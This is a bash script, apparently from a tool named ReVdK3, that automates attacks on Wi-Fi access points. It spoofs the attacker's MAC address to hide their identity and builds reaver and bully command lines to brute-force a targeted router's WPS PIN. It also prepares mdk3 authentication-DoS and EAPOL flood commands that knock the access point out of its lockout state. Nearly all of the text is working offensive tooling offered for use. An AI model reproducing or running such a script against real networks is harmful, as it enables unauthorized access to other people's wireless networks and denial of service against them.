while [   -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan0, wlan0mon etc": WLAN; 
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f2`;
done
PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f1|cut -c 1-4`;
NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
for STOP_INTERFACE in $MONITOR_INTERFACES; do
if [ "$STOP_INTERFACE" != "$WLAN"  ]; then
airmon-ng stop $STOP_INTERFACE > /dev/null;
fi   
done
fi
echo -e "\e[36m\e[1mSuccessful!\e[0m";

echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";

ifconfig $WLAN down
sleep 2
macchanger -r $WLAN
sleep 3
iwconfig $WLAN mode monitor
sleep 3
ifconfig $WLAN up


echo -e "\e[36m\e[1mStarting three new monitor modes...\e[0m";

#MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
#MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`

iw phy $PHY_OF_WLAN_1 interface add mon1 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon2 type monitor;
iw phy $PHY_OF_WLAN_1 interface add mon3 type monitor;

MON1=`iw dev | grep mon1 | cut -d " " -f 2`
MON2=`iw dev | grep mon2 | cut -d " " -f 2`
MON3=`iw dev | grep mon3 | cut -d " " -f 2`

iw dev

echo "Check the interfaces..."


echo "Successful!"

echo "################################################"

trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m"; 
killall -1 ReVdK3-r2.sh;killall mdk3 2> /dev/null; killall -9 reaver 2> /dev/null;killall -9 bully 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null;
rm -f /etc/bully_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null; 
killall aireplay-ng 2> /dev/null;rm -f /etc/aireplay_tmp.txt 2> /dev/null;killall -9 ReVdK3-r2.sh > /dev/null;' SIGINT SIGHUP EXIT
clear
function REAVER_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r  ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        MAC ADDRESS OF AP              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx        ESSID OF AP                    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                              Reaver's Options                              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot!           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's time to wait for a message from the AP)                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d)                                          x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           CHANNEL SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           PIN DELAY SWITCH            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
#TIME OUT CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           TIMEOUT SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[  $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default 
option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx    REAVER COMMAND LINE YOU HAVE CHOOSEN     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then 
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10  -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
read -p "Are you satisified with this configuration? if not,  input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/reaver_tmp.txt ]; then
rm -f /etc/reaver_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}

function BULLY_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r  ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Bully's configuration *\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx          MAC ADDRESS OF AP            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx            ESSID OF AP                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mResetting your mac address to its original mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -p "$WLAN"> /dev/null;
macchanger -p "$MON1"> /dev/null;
macchanger -p "$MON2"> /dev/null;
macchanger -p "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                              Bully's Options                               x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c)                                                     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot!           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully's time between pin (-1)                                           x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Force Bruteforce Checksum Digit (-B -F)                                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[34m\e[7m\e[1mNote:\e[31m\e[0m\e[31m\e[1m
Timeout option (-t) is Deprecated / Ignored in bully.\e[30m\e[0m"
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           CHANNEL SWITCH              x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|)  ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx           FIRST HALF OF PIN DELAY SWITCH            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[  $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']*  ]]; do 
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p  "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
echo ;
#BRUTEFORCE CHECKSUM
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx      BRUTEFORCE CHECKSUM DIGIT SWITCH       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
while [[  $BRUTEFORCE_CHECKSUM != @(y|Y|) ]]; do 
echo -e "\e[31m\e[1mYou need to input 'y'or 'Y' for 'yes' OR  or press ENTER for 'no' !\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
echo;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx    BULLY COMMAND LINE YOU HAVE CHOOSEN      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
############### -B -F arguments false###############################
if [ -z $BRUTEFORCE_CHECKSUM ]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS"  ]; then 
echo "bully -b $MAC  -1 $DISTANCE_BETWEEN_PINS,1 -l 10  -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10  -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -F $MON1"`;
echo ;
fi
fi
############### -B -F arguments true###############################
if [[ "$BRUTEFORCE_CHECKSUM" = @(y|Y) ]]; then
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS"  ]; then 
echo "bully -b $MAC  -1 $DISTANCE_BETWEEN_PINS,1 -l 10  -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10  -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL -l 10 -S -v3 -B -F $MON1"`;
echo;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "bully -b $MAC -c $CHANNEL  -1 $DISTANCE_BETWEEN_PINS,1 -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -c $CHANNEL  -1 "$DISTANCE_BETWEEN_PINS,1" -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" ]; then
echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1";
BULLY_COMMAND_LINE=`echo "bully -b $MAC -l 10 -S -v3 -B -F $MON1"`;
echo ;
fi
fi
echo -e "\e[34m\e[7m\e[1mWarning:\e[31m\e[0m\e[31m\e[1m
Your mac address is not spoofed when using bully for proper functionality of 
bully.\e[30m\e[0m"
echo ;
read -p "Are you satisified with this configuration? if not,  input 'r' and you will be returned to Bully's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/bully_tmp.txt ]; then
rm -f /etc/bully_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                     ReVdK3 preferred WPS Pin Crackers                      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                                                                            x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Reaver v1.4 (legendary)                                                 x\e[0m";
echo -e "\e[36m\e[40m\e[1mx    Choose this option if you prefer to crack with reaver v1.4              x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully v1.0-22                                                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mx    Choose this option if you prefer to crack with bully v1.0-22            x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
while [[ $WPS_PIN_CRACKER_OPTION != @(1|2)  ]]; do
echo -e "\e[31m\e[1mIncorrect Option, input either '1' for reaver or '2' for bully\e[0m";
echo ;
read -p "Choose a preferred WPS Pin Cracker from above": WPS_PIN_CRACKER_OPTION
echo ;
done
if [ $WPS_PIN_CRACKER_OPTION = 1 ]; then
if [ ! -z "$REAVER_CHECK" ]; then 
clear;
REAVER_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mreaver is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
if [ $WPS_PIN_CRACKER_OPTION = 2 ]; then
if [ ! -z "$BULLY_CHECK" ]; then
clear;
BULLY_COMMAND_LINE_OPTIONS
else
echo -e "\e[31m\e[1mbully is not installed.Exiting script...\e[30m\e[0m";
exit
fi
fi
function MDK3_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  WELCOME TO MDK3 FLOOD ATTACK MAIN MENU                    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Authentication DoS Flood Attack                                         x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] EAPOL Start Flood Attack                                                x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] EAPOL log off Flood Attack                                              x\e[0m"; 
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx NOTE:This script will stop reaver once it detects the AP is locked and     x\e[0m";
echo -e "\e[36m\e[40m\e[1mx then flood the Access Point for the time period you choose after flooding  x\e[0m";
echo -e "\e[36m\e[40m\e[1mx reaver resumes.This process goes on until reaver finds the correct pin!    x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
while [[ "$MDK3_MAIN_MENU_OPTION" != @(1|2|3) ]]; do
echo -e "\e[31m\e[1mIncorrect Option choosen, Please choose an option from the Main Menu!\e[0m"; 
echo ;
read -p "Which Attack You Prefer to carry out(Input No.)?": MDK3_MAIN_MENU_OPTION;
done;
if [  "$MDK3_MAIN_MENU_OPTION" = 1  ]; then
clear
AUTH_DOS_MAIN_MENU;
fi
if [  "$MDK3_MAIN_MENU_OPTION" = 2  ]; then
clear
EAPOL_START_FLOOD_ATTACK_MAIN_MENU;
fi
if [  "$MDK3_MAIN_MENU_OPTION" = 3  ]; then
clear
EAPOL_LOG_OFF_ATTACK_MAIN_MENU; 
fi
}
###########################################################################
function AUTH_DOS_MAIN_MENU {
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx                  Authentication DoS Flood Attack                           x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxNOTE:This Attack will start flooding the AP with numerous fake clients      x\e[0m";
echo -e "\e[36m\e[40m\e[1mxuntil reaver detects that the AP is unlocked. The attack will restart when  x\e[0m";
echo -e "\e[36m\e[40m\e[1mxthe AP has locked itself again...the process goes on!                       x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mxThe Authentication DoS Flood Command line below will be used     x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
AUTH_DOS_FLOOD_COMMAND=`echo -e "\e[36m\e[1mmdk3 $MON1 a -a $MAC -s 200 & mdk3 $MON2 a -a $MAC -s 200 & mdk3 "$MON3" a -a $MAC -s 200\e[0m"`;
echo "$AUTH_DOS_FLOOD_COMMAND";
echo ;
read -p "To start the attack press ENTER  to proceed or input 'r' to return to mdk3 main menu": RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS 
